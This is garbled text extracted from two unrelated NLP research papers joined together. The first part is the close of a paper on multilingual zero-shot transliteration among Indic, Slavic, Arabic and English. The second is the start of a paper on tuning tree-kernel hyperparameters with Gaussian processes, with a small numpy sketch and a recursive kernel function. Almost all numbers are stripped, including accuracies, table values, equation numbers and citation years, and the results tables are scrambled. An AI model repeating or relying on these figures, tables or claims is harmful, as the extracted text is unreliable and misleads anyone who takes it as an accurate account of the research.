transliteration i.e., transliteration between language pairs that have not been seen during train- ing. 
the encoder-decoder architecture decouples the source and target language network compo- nents and makes the architecture more modular. as a consequence, we can consider the encoder out- put (for the source language) to be embedded in a language-neutral, common subspace - a sort of inter- lingua. the decoder proceeds to generate the target word from the language neutral representation of the source word. hence, training on just a few language pairs is sufficient to learn all language-specific pa- rameters - making zeroshot transliteration possible. before describing different zeroshot translitera- tion scenarios, we introduce a few terms. a language that is the source in any language pair seen during training is said to be source-covered. we can define target-covered languages analogously. now, we can envisage the following zeroshot transliteration sce- narios: (a) unseen language pairs: both the source and target languages are covered, but the pair was not observed during training, (b) unseen source lan- guage: the source language is not covered, but it is orthographically similar to other source-covered lan- guages, (c) unseen target language: can be defined analogously. next, we describe our proposed solu- tions to these scenarios. . unseen language pair we investigated the following solutions: multilingual zeroshot-direct: since source and target languages are covered, we use the trained mul- tilingual model discussed in previous sections for source-target transliteration. model selection can be an issue for this approach. as discussed earlier, model selection using valida- tion set accuracy for each language pair is better than average validation set loss. for an unseen language pair, we cannot use validation set accuracy/loss for model selection (since validation data is not avail- able). so we explored the following model selection criterion: maximum average validation set accuracy across all the trained language pairs (sc_acc). we also compared sc_acc to the model with least av- erage validation set loss over all training language pairs (sc_loss). nevertheless, there are inherent limitations to model selection by averaging validation accuracy or loss for trained language pairs. irrespective of the model selection method used, the chosen model may still be suboptimal for unseen language pairs since the network is not optimized for such pairs. multilingual zeroshot-pivot: to address the limi- tations with zeroshot-direct transliteration, we pro- pose transliteration from source to target using a pivot language, and pipelining the best source-pivot and pivot-target transliteration models. we choose a pivot language such that the network has been trained for source-pivot and pivot-target pairs. since the network has been trained for the source-pivot and target-pivot pairs, we can expect optimal perfor- mance in each stage of the pipeline. note thatweuse the multilingual model for source-pivot and pivot- target transliteration (we found it better than using the bilingual models). to reduce cascading errors due to pipelining, we consider the top-k source-pivot transliterations in the next stage of the pipeline. the probability for a target word y given the source word x is computed as: p(y|x) = k∑ i= p(y|zi)p(zi|x) ( ) zi: ith best source-pivot transliteration. we used k= . . unseen source language an unseen source language can be easily handled in our architecture. 
though the language has not been source-covered, a source word can be directly processed through the network since all source lan- guages share the encoder and character embeddings. . unseen target language handling an unseen target language is tricky since the output layer is specific to each target language. hence, parameters for the unseen language’s output layer cannot be learned during training. note that even architectures where the entire network is com- pletely shared between all language pairs (johnson et al., ) cannot handle an unseen target language - pair biling zeroshot zeroshotdirect pivoting † direct sc_acc sc_loss sc_ora bn-ta . . (hi) . . . ta-bn . . (hi) . . . hi-kn . . (ta) . . . kn-hi . . (ta) . . . † best pivot for multilingual pivoting in brackets (a) unseen language pair method slavic-ar (cs-ar) indic-en (hi-en) bilingual . . zeroshot . . multilingual . . (b) unseen source language method ar-slavic (ar-cs) en-indic (en-hi) proxy acc proxy acc bilingual none . none . sk . kn . proxy sl . bn . pl . ta . proxy sk . kn . + sl . bn . lmfusion pl . ta . (c) unseen target language table : results for zeroshot transliteration the embedding for target language indicator tokens are not learned during training for unseen target lan- guages. we found that simple approaches like as- signing parameters for unseen target languages by averaging the parameters of the trained target lan- guages do not work. hence, we use a target-covered language as proxy for the unseen target language. the simplest ap- proach considers the output of the source to proxy language transliteration system as the target lan- guage’s output. however, this doesn’t take into ac- count phonotactic characteristics of the target lan- guage. we propose to incorporate this information by using an rnn (using lstm units) character-level language model of the target language words. while predicting the next output character during decoding, we combine the scores from the multilingual translit- eration model and the target lm using shallow fu- sion of the transliteration model and the language model (gulcehre et al., ). . results and discussion we discuss the results for each scenario below. . . unseen language pair we experimented with transliteration between four indic languages viz., hi,bn,ta,kn. we trained a mul- tilingual model on out of the possible language pairs, covering all the languages. the remaining language pairs (ta-bn, bn-ta, hi-kn and hi-kn) are the unseen language pairs (results in table a). zeroshot vs. direct bilingual: for all unseen lan- guage pairs, all zeroshot systems (pivot as well dif- ferent direct configurations) are better than the di- rect bilingual system. note that unlike the zeroshot systems, the bilingual systems were directly trained on the unseen language pairs. yet the zeroshot sys- tems outperform direct bilingual systems since the underlying multilingual models are significantly bet- ter than the bilingual models (as seen in section ). these results show that the multilingual model gen- eralizes well to unseen language pairs. direct vs. pivot zeroshot: we also observe that the pivot zeroshot system is better than both of the direct zeroshot systems (sc_acc and sc_loss). to verify if the limitations of the model selection criterion ex- plain the direct system’s relatively lesser accuracy, we also considered an oracle direct zeroshot system (sc_ora). the oracle system selects the model with the best accuracy using a parallel validation corpus for the unseen language pair. 
this oracle system is also inferior to the pivot transliteration model. so, we can conclude that the network is better tuned for transliteration of language pairs it has been directly trained on. hence, multilingual pivoting works bet- ter than direct transliteration in spite of the cascading errors involved in pipelining. model selection criteria: for the direct zeroshot system, the average accuracy (sc_acc) is a better model selection criterion than average loss (sc_loss). . . unseen source language we conducted experiments: (a) train on (bn,kn,ta)- en pairs and test on hi-en pair, and; (b) train on (pl,sk,sl)-ar pairs and test on cs-ar pair. see table b for results. in this scenario, too, we observe that zeroshot transliteration performs better than direct bilingual transliteration. in fact, zeroshot transliter- ation is competitive with multilingual transliteration too (accuracy is > % of multilingual translitera- tion). though the network has not seen the source language, the encoder is able to generate source lan- guage representations that are useful for decoding. . . unseen target language we conducted experiments: (a) train on ar- (pl,sk,sl) pairs and test on ar-cs pair, and;(b) train on en-(bn,kn,ta) pairs and test on en-hi pair. the target languages used in training were the proxy languages. see table c for results. we observe contradictory results for the experi- ments. for ar-cs, the use of proxy language gives transliteration results better than bilingual transliter- ation. but, the proxy language is not a good substi- tute for hindi. shallow fusion of target lm with the transliteration model makes little difference. we see that the transliteration performance of proxy languages is correlated to its orthographic sim- ilarity to the target language. thus, it is preferable to choose a proxy with high orthographic similar- ity to the target language. we see one anomaly to this trend. kannada as proxy performs badly com- pared to bengali, though kannada is orthographi- cally more similar to hindi. one reason could be the orthographic convention in hindi and bengali that the terminal vowel is automatically suppressed. in kannada, the vowel has to be explicitly suppressed with a terminal halanta character. simply deleting theterminalhalanta in kannadaoutput to conform to hindi conventions increases accuracy to . % (bet- ter than bengali). clearly, shallow fusion is not suf- ficient to adapt a proxy language’s output to the tar- get language, and further investigations are required. if a proxy-target corpus is available, we can generate better transliterations via pivoting. incorporating phonetic information so far, we considered characters as atomic units. we have thus relied on correspondences between charac- ters for multilingual learning. in addition, for some languages, we can find an almost one-one correspon- dence from the characters to phonemes (a basic unit of sound). each phoneme can be factorized into a set of articulatory properties like place of articulation, nasalization, voicing, aspiration, etc. if the input for transliteration incorporates these phonetic prop- erties, it may learn better character representations pair o ph pair o ph indic- bn-en . . kn-en . . english hi-en . . ta-en . . bn-hi . . kn-bn . . indic- bn-kn . . kn-ta . . indic hi-bn . . ta-hi . . hi-ta . . ta-kn . . table : onehot (o) vs. phonetic (ph) input across languages by bringing together similar char- acters. e.g. 
the kannada character ಳ (la), has no hindi equivalent character, but the hindi character ल (la) is the closest character. the two characters differ in terms of one phonetic feature (the retroflex property), which can be represented in the phonetic input and can serve to indicate the similarity between the two characters. we incorporated phonetic features in our model by using feature-rich input vectors instead of the con- ventional onehot vector input for characters. our phonetic feature input vector is a bitvector encod- ing the phonetic properties of the character, one bit for each value of every property. the multiplication of the phonetic feature vector with the weight ma- trix in the first layer generates phonetic embeddings for each character. these are inputs to the encoder. apart from this input change, the rest of the network architecture is the same as described in section . . experiments: we experimented with indian lan- guages (indic→english and indic-indic translitera- tion). indic scripts generally have a one-one cor- respondence from characters to phonemes. hence, we use phonetic features described by kunchukut- tan et al. ( ) to generate phonetic feature vectors for characters (available via the indicnlplibrary ). these indic languages are spoken by nearly a billion people and hence the use of phonetic features is use- ful for many of the world’s most widely spoken lan- guages. results and discussion: table shows the results. we observe that phonetic feature input improves transliteration accuracy for indic-english transliter- ation. the improvements are primarily due to reduc- tion in errors related to similar consonants like (t,d), (p,b), (c,k) and the use of h for aspiration. https://github.com/anoopkunchukuttan/indic_ nlp_library for indic-indic transliteration, we see moderate improvement in transliteration accuracy due to pho- netic feature input. since the source as well as tar- get scripts are largely phonetic, phonetic representa- tion may not be useful in resolving ambiguities (un- like indic-english transliteration). again, we see im- provements due to reduction of errors related to sim- ilar consonants. conclusion and future work we show that multilingual training using a neural encoder-decoder architecture significantly improves transliteration involving orthographically similar languages compared to bilingual training. our key idea is maximal sharing of network components in order to utilize high task relatedness on account of orthographic similarity. the primary reasons for the improvements could be: (a) learning of specialized representations by the shared encoder and; (b) abil- ity to learn canonical spellings. we also show that the multilingual transliteration models can general- ize well to language pairs not encountered during training and observe that zeroshot transliteration can outperform direct bilingual transliteration in many cases. moreover, multilingual transliteration can be further improved by shared phonetic input. transliteration is an example of a sequence to se- quence task which is characterized by the follow- ing properties: (a) small vocabulary (b) short se- quences (c) monotonic transformation (d) unequal source and target sequence length (e) significant vo- cabulary overlap across languages. 
given the bene- fits we have shown for multilingual transliteration, other nlp tasks that can be characterized simi- larly (viz., grapheme to phoneme conversion, trans- lation of short text like tweets and headlines between related languages at subword level, and possibly speechrecognitionaswellastts)couldalsobenefit from multilingual training. acknowledgements we would like to thank rudramurthy v for making available code for parsing wikidata and extracting multilingual named entities. we would also like to thank the action editor and reviewers for their valu- able comments. references dzmitry bahdanau, kyunghyun cho, and yoshua ben- gio. . neural machine translation by jointly learn- ing to align and translate. in international conference on learning representations. rafael e. banchs, min zhang, xiangyu duan, haizhou li, and a. kumaran. . report of news machine transliteration shared task. in proceedings of the fifth named entities workshop. maximilian bisani and hermann ney. . joint- sequence models for grapheme-to-phoneme conver- sion. speech communication. rich caruana. . multitask learning. machine learn- ing. daxiang dong, hua wu, wei he, dianhai yu, and haifeng wang. . multi-task learning for mul- tiple language translation. in annual meeting of the association for computational linguistics. andrew finch and eiichiro sumita. . a bayesian model of bilingual segmentation for transliteration. in internationalworkshoponspokenlanguagetransla- tion. andrew finch, lemao liu, xiaolin wang, and eiichiro sumita. . neural network transduction models in transliteration generation. in proceedings of the fifth named entities workshop. andrew finch, lemao liu, xiaolin wang, and eiichiro sumita. . target-bidirectional neural models for machine transliteration. in proceedings of the sixth named entities workshop. orhan firat, kyunghyun cho, and yoshua bengio. . multi-way, multilingual neural machine translation with a shared attention mechanism. in conference of the north american chapter of the association for computational linguistics. dan gillick, cliff brunk, oriol vinyals, and amarnag subramanya. . multilingual language process- ing from bytes. in conference of the north american chapter of the association for computational linguis- tics. caglar gulcehre, orhan firat, kelvin xu, kyunghyun cho, and yoshua bengio. . on integrating a lan- guage model into neural machine translation. com- puter speech and language. junqing he, long wu, xuemin zhao, and yonghong yan. . hccl at semeval- task : combin- ing multilingual word embeddings and transliteration model for semantic similarity. in proceedings of the th international workshop on semantic evaluation. jagadeesh jagarlamudi and hal daumé iii. . reg- ularized interlingual projections: evaluation on mul- tilingual transliteration. in proceedings of the joint conference on empirical methods in natu- ral language processing and computational natural language learning. sittichai jiampojamarn, colin cherry, and grzegorz kon- drak. . joint processing and discriminative train- ing for letter-to-phoneme conversion. in annual meet- ing of the association for computational linguistics. sittichai jiampojamarn, aditya bhargava, qing dou, kenneth dwyer, and grzegorz kondrak. . di- rectl: a language-independent approach to translit- eration. in proceedings of the named entities workshop: shared task on transliteration. melvin johnson, mike schuster, quoc v. le, maxim krikun, yonghui wu, zhifeng chen, nikhil thorat, fernanda b. 
viégas, martin wattenberg, greg cor- rado, macduff hughes, and jeffrey dean. . google’s multilingual neural machine translation sys- tem: enabling zero-shot translation. transactions of the association for computational linguistics. sarvnaz karimi, falk scholer, and andrew turpin. . machine transliteration survey. acm computing sur- veys. mitesh m. khapra, a. kumaran, and pushpak bhat- tacharyya. . everybody loves a rich cousin: an empirical study of transliteration through bridge lan- guages. in human language technologies: the annual conference of the north american chapter of the association for computational linguistics. diederikkingmaandjimmyba. . adam: amethod for stochastic optimization. in international confer- ence on learning representations. alexandre klementiev and dan roth. . weakly supervised named entity transliteration and discovery from multilingual comparable corpora. inproceedings of the st internationalconferenceoncomputational linguistics and the th annual meeting of the asso- ciation for computational linguistics. philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richard zens, chris dyer, ondřej bojar, alexandra constantin, and evan herbst. . moses: open source toolkit for statistical machine translation. in proceedings of the th annual meeting of the acl on interactive poster and demonstration sessions. a. kumaran, mitesh m. khapra, and pushpak bhat- tacharyya. . compositional machine transliter- ation. acm transactions on asian language infor- mation processing. anoop kunchukuttan and pushpak bhattacharyya. . data representation methods and use of mined corpora for indian language transliteration. in named entities workshop. anoop kunchukuttan, ratish puduppully, and pushpak bhattacharyya. . brahmi-net: a transliteration and script conversion system for languages of the in- dian subcontinent. in conference of the north amer- ican chapter of the association for computational linguistics - human language technologies: system demonstrations. anoop kunchukuttan, pushpak bhattacharyya, and mitesh m. khapra. . substring-based unsu- pervised transliteration with phonetic and contextual knowledge. in signll conference on computational natural language learning. jason lee, kyunghyun cho, and thomas hofmann. . fully character-level neural machine transla- tion without explicit segmentation. transactionsof the association for computational linguistics. bruno pouliquen, ralf steinberger, camelia ignat, tem- nikova irina, and anna widiger. . multilingual person name recognition and transliteration. corela. ram prakash. . quillpad multilingual predictive transliteration system. in proceedings of the second workshop on advances in text input methods. v. rudramurthy, mitesh m. khapra, and pushpak bhat- tacharyya. . sharing network parameters for crosslingual named entity recognition. arxiv preprint arxiv: . . amrita saha, mitesh m. khapra, sarath chandar, ja- narthanan rajendran, and kyunghyun cho. . a correlational encoder-decoder architecture for pivot- based sequence generation. in international confer- ence on computational linguistics. rico sennrich, orhan firat, kyunghyun cho, alexan- dra birch, barry haddow, julian hitschler, marcin junczys-dowmunt, samuel läubli, antonio valerio miceli barone, jozef mokry, and maria nadejde. . nematus: a toolkit for neural machine trans- lation. 
in software demonstrations of the th con- ference of the european chapter of the association for computational linguistics. nitish srivastava, geoffrey hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . dropout: a simple way to prevent neural networks from overfitting. the journal of machine learning research. kārumūri v subbārāo. . south asian languages: a syntactic typology. cambridge university press. harshit surana and anil kumar singh. . a more discerning and adaptable multilingual transliteration mechanism for indian languages. in proceedings of the third international joint conference on natural language processing. laurens van der maaten and geoffrey hinton. . vi- sualizing data using t-sne. journalofmachinelearn- ing research. denny vrandečić and markus krötzsch. . wikidata: a free collaborative knowledgebase. communications of the acm. zhilin yang, ruslan salakhutdinov, and william cohen. . multi-task cross-lingual sequence tagging from scratch. arxiv preprint arxiv: . . su-youn yoon, kyoung-young kim, and richard sproat. . multilingual transliteration using fea- ture based phonetic method. in annual meeting- association for computational linguistics. barret zoph, deniz yuret, jonathan may, and kevin knight. . transfer learning for low-resource neural machine translation. learning structural kernels for natural language processing daniel beck department of computer science university of sheffield, united kingdom debeck @sheffield.ac.uk trevor cohn computing and information systems university of melbourne, australia t.cohn@unimelb.edu.au christian hardmeier department of linguistics and philology uppsala university, sweden christian.hardmeier@lingfil.uu.se lucia specia department of computer science university of sheffield, united kingdom l.specia@sheffield.ac.uk abstract structural kernels are a flexible learning paradigm that has been widely used in natural language processing. however, the problem of model selection in kernel-based methods is usually overlooked. previous approaches mostly rely on setting default values for ker- nel hyperparameters or using grid search, which is slow and coarse-grained. in con- trast, bayesian methods allow efficient model selection by maximizing the evidence on the training data through gradient-based methods. in this paper we show how to perform this in the context of structural kernels by using gaussian processes. experimental results on tree kernels show that this procedure results in better prediction performance compared to hyperparameter optimization via grid search. the framework proposed in this paper can be adapted to other structures besides trees, e.g., strings and graphs, thereby extending the util- ity of kernel-based methods. introduction kernel-based methods are a staple machine learning approach in natural language processing (nlp). frequentist kernel methods like the support vector machine (svm) pushed the state of the art in many nlp tasks, especially classification and regression. one interesting aspect of kernels is their ability to be defined directly on structured objects like strings, trees and graphs. this approach has the potential to move the modelling effort from feature engineering to kernel engineering. this is useful when we do not have much prior knowledge about how the data behaves, as we can more readily define a similarity metric between inputs instead of trying to character- ize which features are the best for the task at hand. 
kernels are a very flexible framework: they can be combined and parameterized in many different ways. complex kernels, however, lead to the prob- lem of model selection, where the aim is to obtain the best kernel configuration in terms of hyperpa- rameter values. the usual approach for model selec- tion in frequentist methods is to employ grid search on some development data disjoint from the training data. this approach can rapidly become impracti- cal when using complex kernels which increase the number of model hyperparameters. grid search also requires the user to explicitly set the grid values, making it difficult to fine tune the hyperparameters. recent advances in model selection tackle some of these issues, but have several limitations (see § for details). our proposed approach for model selection re- lies on gaussian processes (gps) (rasmussen and williams, ), a widely used bayesian kernel ma- chine. gps allow efficient and fine-grained model selection by maximizing the evidence on the training data using gradient-based methods, dropping the re- quirement for development data. as a bayesian pro- cedure, gps also naturally balance between model capacity and generalization. gps have been shown to achieve state of the art performance in various re- gression tasks (hensman et al., ; cohn and spe- cia, ). therefore, we base our approach on this framework. while prediction performance is important to consider (as we show in our experiments), we are transactions of the association for computational linguistics, vol. , pp. – , . action editor: stefan riezler. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by . license. mainly interested in two other significant aspects that are enabled by our approach: • gradient-based methods are more efficient than grid search for high dimensional spaces. this allows us to easily propose new rich kernel ex- tensions that rely on a large number of hyper- parameters, which in turn can result in better modelling capacity. • since the model selection process is now fine- grained, we can interpret the resulting hyperpa- rameter values, depending on how the kernel is defined. in this work we focus on tree kernels, which have been successfully used in a number of nlp tasks (see § ). in most cases, these kernels are used as an svm component and model selection is not consid- ered an important issue. hyperparameters are usu- ally set to default values, which work reasonably well in terms of prediction performance. however, this is only possible due to the small number of hy- perparameters these kernels contain. we perform experiments comprising synthetic data (§ ) and two real nlp regression tasks: emo- tion analysis (§ . ) and translation quality estima- tion (§ . ). our findings show that our approach out- performs svms using the same kernels. gaussian process regression our definition of gps closely follows that of rasmussen and williams ( ). consider a setting where we have a dataset x = {(x ,y ), (x ,y ), . . . , (xn,yn)}, where xi is a d- dimensional input and yi the corresponding out- put. our goal is to infer an underlying function f : rd → r to explain this data, i.e. f(xi) ≈ yi. formally, f is drawn from a gp prior, f(x) ∼gp(µ(x),k(x,x′)), where µ(x) is the mean function, which is usually the constant, and k(x,x′) is the kernel function. 
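to make the prior concrete, the short numpy sketch below (our own illustration, not from the paper) draws a few functions from a gp prior with a zero mean function and a standard rbf kernel over scalar inputs; any valid kernel, including the tree kernels discussed later, could take the place of the rbf here.

```python
import numpy as np

def rbf(x1, x2, lengthscale=1.0, variance=1.0):
    # squared-exponential covariance between two sets of scalar inputs
    sqdist = (x1[:, None] - x2[None, :]) ** 2
    return variance * np.exp(-0.5 * sqdist / lengthscale ** 2)

x = np.linspace(-5, 5, 100)                 # input locations
K = rbf(x, x)                               # prior covariance (gram matrix)
samples = np.random.multivariate_normal(
    mean=np.zeros(len(x)), cov=K + 1e-8 * np.eye(len(x)), size=3)
# each row of `samples` is one function drawn from the prior, evaluated on x
```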
in a regression setting, we assume that the response variables are noisy latent function evaluations, i.e., $y_i = f(x_i) + \eta$, where $\eta \sim \mathcal{N}(0, \sigma_n^2)$ is added white noise. we assume a gaussian likelihood, which allows us to obtain a closed-form solution for the posterior, namely

$$y_* \sim \mathcal{N}\big(\mathbf{k}_*^T (K + \sigma_n^2 I)^{-1} \mathbf{y},\; k(x_*, x_*) - \mathbf{k}_*^T (K + \sigma_n^2 I)^{-1} \mathbf{k}_*\big),$$

where $x_*$ and $y_*$ are respectively the test input and its response variable, $K$ is the gram matrix corresponding to the training inputs and $\mathbf{k}_* = [k(x_1, x_*), k(x_2, x_*), \ldots, k(x_n, x_*)]$ is the vector of kernel evaluations between the test input and each training input.

a key property of gp models is their ability to perform efficient model selection. this is achieved by employing gradient-based methods to maximize the marginal likelihood,

$$p(\mathbf{y}|X, \theta) = \int p(\mathbf{y}|X, \theta, \mathbf{f})\, p(\mathbf{f})\, d\mathbf{f},$$

where $\theta$ represents the vector of model hyperparameters and $\mathbf{y}$ is the vector of response variables from the training data. for a gaussian likelihood, we can take the log of the expression above to obtain, in closed form,

$$\log p(\mathbf{y}|X, \theta) = \underbrace{-\tfrac{1}{2}\, \mathbf{y}^T G^{-1} \mathbf{y}}_{\text{data fit}} \;\underbrace{-\tfrac{1}{2} \log |G|}_{\text{complexity penalty}} \;\underbrace{-\tfrac{n}{2} \log 2\pi}_{\text{constant}},$$

where $G = K + \sigma_n^2 I$. the data fit term depends on the training response variables, while the complexity penalty term relies only on the kernel and training inputs. since the first two terms have conflicting objectives, optimizing the log marginal likelihood will naturally achieve a compromise and thus limit overfitting (without the need for any validation step or additional data). to enable gradient-based optimization we need to derive the gradients w.r.t. the hyperparameters:

$$\frac{\partial}{\partial \theta_j} \log p(\mathbf{y}|X, \theta) = \tfrac{1}{2}\, \mathbf{y}^T G^{-1} \frac{\partial G}{\partial \theta_j} G^{-1} \mathbf{y} - \tfrac{1}{2}\, \mathrm{trace}\!\left( G^{-1} \frac{\partial G}{\partial \theta_j} \right).$$

see rasmussen and williams ( , pp. - ) for details on the derivation of this formula and its corresponding gradient calculation. the gradients of $G$ depend on the underlying kernel. therefore we can employ any kind of valid kernel in this procedure as long as its gradients can be computed. this not only allows for fine-tuning of hyperparameters but also allows for kernel extensions which are richly parameterized.

tree kernels

the seminal work on convolution kernels by haussler ( ) defines a broad class of kernels on discrete structures by counting and weighting the number of substructures they share. applying haussler's formulation to trees, we reach a general formula for a tree kernel between two trees $T_1$ and $T_2$, namely

$$k(T_1, T_2) = \sum_{f \in \mathcal{F}} w(f)\, c_1(f)\, c_2(f),$$

where $\mathcal{F}$ is the set of all tree fragments, $c_1(f)$ and $c_2(f)$ return the counts for fragment $f$ in trees $T_1$ and $T_2$, respectively, and $w(f)$ assigns a weight to fragment $f$. in other words, we can consider the kernel a weighted dot product over vectors of fragment counts. the actual fragment set $\mathcal{F}$ is deliberately left undefined: different concepts of tree fragments define different tree kernels. in this paper, we focus on subset tree kernels (henceforth sstk), first introduced by collins and duffy ( ). this kernel considers tree fragments that contain complete grammar rules (see figure for an example). consider the sets of nodes in the two trees as $N_1$ and $N_2$, respectively. we define $I_i(n)$ as an indicator function that returns 1 if fragment $f_i \in \mathcal{F}$ has root $n$ and 0 otherwise. a sstk can then be defined as:

$$k(T_1, T_2) = \sum_{n_1 \in N_1} \sum_{n_2 \in N_2} \Delta(n_1, n_2),$$

where

$$\Delta(n_1, n_2) = \sum_{i=1}^{|\mathcal{F}|} \lambda^{s(i)}\, I_i(n_1)\, I_i(n_2)$$

and $s(i)$ is the number of nodes in fragment $f_i$ with at least one child.
the formulation in equation is the same as the one shown in equation , except that we are now restricting the weights w(f) to be a function of a hyperparameter λ (see pighin and moschitti ( ) for details and a proof of this derivation).

(figure : an example tree and the respective set of tree fragments defined by a sstk.)

the original goal of λ is to act as a decay factor that penalizes contributions from larger fragments compared to smaller ones (and therefore, it should lie in the [0, 1] interval). without this factor, the resulting distribution over tree pairs is skewed, giving extremely large values when trees are equal and rapidly decreasing for small differences over fragment counts. the decay factor helps to spread this distribution, effectively giving smaller weights to larger fragments. the function ∆ can be defined recursively,

$$\Delta(n_1, n_2) = \begin{cases} 0 & \text{if } pr(n_1) \neq pr(n_2) \\ \lambda & \text{if } pr(n_1) = pr(n_2) \wedge preterm(n_1) \\ \lambda\, g(n_1, n_2) & \text{otherwise,} \end{cases}$$

where pr(n) is the grammar production at node n and preterm(n) returns true if n is a pre-terminal node. the function g is defined as follows:

$$g(n_1, n_2) = \prod_{i=1}^{|n_1|} \big(\alpha + \Delta(c_{n_1}^i, c_{n_2}^i)\big),$$

where |n| is the number of children of node n and $c_n^i$ is the i-th child of node n. this recursive definition is calculated efficiently by employing dynamic programming to cache intermediate ∆ results. equation also adds another hyperparameter, α. this hyperparameter was introduced by moschitti ( b) as a way to select between two different tree kernels (in his original formulation this hyperparameter was named σ, but here we use α to avoid confusing it with the gp noise hyperparameter). if α = 1, we get the original sstk; if α = 0, we obtain the subtree kernel, which only allows fragments with terminal symbols as leaves. we can also interpret the subtree kernel as a "sparse" version of the sstk, where the "non-subtree" fragments have their weights equal to zero. even though fragment weights are affected by both kernel hyperparameters, previous work did not discuss their effects. the usual procedure fixes α to 1 (selecting the original sstk) and sets λ to a default value (around . ). as explained in § , the gp model selection procedure enables us to learn fine-grained values for these hyperparameters, which can lead to better performing models and aid interpretation. furthermore, it also allows us to extend these kernels by adding new hyperparameters. we propose one such kernel in the next section.

. symbol-aware subset tree kernel

while varying the sstk hyperparameters can lead to different weighting schemes, they do so in a very coarse way. for some applications, it may be necessary to give more weight to specific fragments or sets of fragments (e.g., nps being more important than advps in an information extraction setting). the symbol-aware subset tree kernel (henceforth sasstk), which we introduce here, allows more fine-grained control over the weights by employing one λ and one α hyperparameter for each non-terminal symbol in the training data. the calculation uses a recursive formula similar to the sstk, namely:

$$\Delta(n_1, n_2) = \begin{cases} 0 & \text{if } pr(n_1) \neq pr(n_2) \\ \lambda_x & \text{if } pr(n_1) = pr(n_2) \wedge preterm(n_1) \\ \lambda_x\, g_x(n_1, n_2) & \text{otherwise,} \end{cases}$$

where x is the symbol at node $n_1$ and

$$g_x(n_1, n_2) = \prod_{i=1}^{|n_1|} \big(\alpha_x + \Delta(c_{n_1}^i, c_{n_2}^i)\big).$$

the sasstk can be interpreted as a generalization of the sstk: we can recover the latter by tying all λ to a single value and setting all α = 1.
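the recursions above translate directly into a memoized dynamic program. the sketch below is illustrative only (not the authors' implementation): it assumes trees are nested (label, children) tuples with terminals appearing only under pre-terminal nodes, as in treebank-style trees, and it takes per-symbol λ and α dictionaries, so tying all entries to a single value with α = 1 recovers the plain sstk.

```python
def nodes(tree):
    """yield every non-terminal node of the tree (terminals are plain strings)."""
    if isinstance(tree, str):
        return
    yield tree
    for child in tree[1]:
        yield from nodes(child)

def production(node):
    """the grammar production at a node: its label plus the sequence of child labels."""
    label, children = node
    return (label, tuple(c if isinstance(c, str) else c[0] for c in children))

def is_preterminal(node):
    return all(isinstance(c, str) for c in node[1])

def sstk(t1, t2, lam, alpha):
    """symbol-aware subset tree kernel between trees t1 and t2."""
    cache = {}

    def delta(n1, n2):
        key = (id(n1), id(n2))
        if key in cache:
            return cache[key]
        if production(n1) != production(n2):
            val = 0.0
        elif is_preterminal(n1):
            val = lam[n1[0]]                      # lambda for the symbol at this node
        else:
            prod = 1.0
            for c1, c2 in zip(n1[1], n2[1]):      # equal productions, so children align
                prod *= alpha[n1[0]] + delta(c1, c2)
            val = lam[n1[0]] * prod
        cache[key] = val
        return val

    return sum(delta(n1, n2) for n1 in nodes(t1) for n2 in nodes(t2))
```

for example, passing `lam = collections.defaultdict(lambda: 0.5)` and `alpha = collections.defaultdict(lambda: 1.0)` gives an untuned sstk; the kernel normalization discussed below is omitted here.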
by employing different hyperparameter values for each specific symbol, we can effectively modify the weights of all fragments where the symbol appears. table shows an exam- ple where we unrolled a kernel computation into its corresponding feature space, showing the resulting weighted counts for each feature. λs = λa = λb = λs = . λa = λb = λs = λa = λb = a → a b → b s → a b . s → (a a) b . s → a (b b) . s → (a a) (b b) . k(t,t) table : resulting fragment weighted counts for the ker- nel evaluation k(t,t), for different values of hyperparam- eters, where t is the tree in figure . . kernel gradients to enable hyperparameter optimization via gradient descent we must provide gradients for the kernels. in this section we derive the gradients for sasstk. from equation we know that the kernel is a dou- ble summation over the ∆ function. therefore all gradients are also double summations, but over the gradients of ∆. we can obtain these in a vectorized way, by considering the gradients of the hyperpa- rameter vectors λ and α over ∆. let k be the num- ber of symbols considered in the model and λ and α be k-dimensional vectors containing the respec- tive hyperparameters. in the following, we use the notation ∆i as a shorthand for ∆(cin ,c i n ) and we also omit the pa- rameters of gx. we start with the λ gradient: ∂∆ ∂λ =    pr(n ) = pr(n ) u pr(n ) = pr(n ) ∧ preterm(n ) ∂(λxgx) ∂λ otherwise, where x is the symbol at n , gx is defined in equa- tion and u is the k-dimensional unit vector with the element corresponding to symbol x equal to and all others equal to . the gradient in the third case is defined recursively, ∂(λxgx) ∂λ = ugx + λx ∂gx ∂λ = ugx + λx |n |∑ i= gx αx + ∆i ∂∆i ∂λ . the α gradient is derived in a similar way, ∂∆ ∂α =    pr(n ) = pr(n ) ∨ preterm(n ) ∂(λxgx) ∂α otherwise, and the gradient at the second case is also defined recursively, ∂(λxgx) ∂α = λx ∂gx ∂α = λx |n |∑ i= gx αx + ∆i ( u + ∂∆i ∂α ) . gradients can be efficiently obtained using dy- namic programming. in fact, they can be calculated at the same time as ∆ to improve performance since they all share many terms in their derivations. fi- nally, we can easily obtain the gradients for the orig- inal sstk by letting u = . . kernel normalization it is common practice when using tree kernels to nor- malize the kernel. this helps reduce the random ef- fect of tree size. normalization can be achieved us- ing the following, where k̂ is the normalized kernel: k̂(t , t ) = k(t , t )√ k(t , t )k(t , t ) . to apply this normalized version in the optimiza- tion procedure we must also derive gradients for the normalization function. in the following equation, we use kij and k̂ij as a shorthand for k(ti, tj) and k̂(ti, tj), respectively: ∂k̂ ∂θ = ∂k ∂θ√ k k − k̂ ∂k ∂θ k + k ∂k ∂θ k k . . other extensions many other structural kernels rely on recursive def- initions and dynamic programming to perform their calculations. examples include other tree kernels like the partial tree kernel (moschitti, a) and string kernels like the ones defined on character n- grams (lodhi et al., ) or word sequences (can- cedda et al., ). while in this paper we focus on the sstk (and our proposed sasstk), our ap- proach can easily be extended to these other kernels, as long as all the corresponding recursive definitions are differentiable. synthetic data experiments a natural question that arises in the proposed method is how much data is needed to accurately learn the kernel hyperparameters. 
